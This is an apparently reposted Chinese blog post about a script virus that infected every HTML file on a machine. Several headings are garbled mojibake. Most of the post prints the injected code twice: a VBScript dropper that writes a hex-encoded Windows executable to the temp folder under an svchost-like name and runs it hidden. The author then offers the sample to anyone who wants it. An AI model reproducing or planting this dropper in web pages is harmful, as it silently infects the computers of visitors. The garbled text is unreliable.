首页暗影LXH十三先生js鑴氭湰鐥呮瘨閫氳繃缃戦〉浼犳挱 (鑷埗js鑴氭湰鐥呮瘨)

js鑴氭湰鐥呮瘨閫氳繃缃戦〉浼犳挱 (鑷埗js鑴氭湰鐥呮瘨)

🏷️ 暗影LXH十三先生 ✍️ 男人,修身,齐家,志国,平天下!-- 📅 2021-01-16 14:23:50

js鎬庝箞闃叉鑴氭湰鐥呮瘨,闃叉js鑴氭湰鐥呮瘨

病毒分析 admin 3年前 (2017-11-17) 9781次浏览 已收录 3个评论

最近遇到个js脚本感染病毒,把每一个html文件都感染了,就是在文件末尾加一个js代码,功效未知。360说是virus.vbs.writebin.a病毒。

js鎬庝箞闃叉鑴氭湰鐥呮瘨,闃叉js鑴氭湰鐥呮瘨

大致代码结构是这样的。

<SCRIPT Language=VBScript><!–DropFileName = “svchost*ex.e**”WriteData = “4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E804000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

省略N多ANCD

36573730000004472616746696E697368000057696E48656C705700000000000000000000”Set FSO = CreateObject(“Scripting.FileSystemObject”)DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileNameIf FSO.FileExists(DropPath)=False ThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData) Step 2FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSet WSHshell = CreateObject(“WScript.Shell”)WSHshell.Run DropPath, 0//–></SCRIPT><SCRIPT Language=VBScript><!–DropFileName = “svchost*ex.e**”WriteData = “4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B010

省略N多ABCD

65650000004578697450726F636573730000004472616746696E697368000057696E48656C705700000000000000000000”Set FSO = CreateObject(“Scripting.FileSystemObject”)DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileNameIf FSO.FileExists(DropPath)=False ThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData) Step 2FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSet WSHshell = CreateObject(“WScript.Shell”)WSHshell.Run DropPath, 0//–></SCRIPT>

功能好像还蛮强,样本给有需要的人吧。

2017111703545541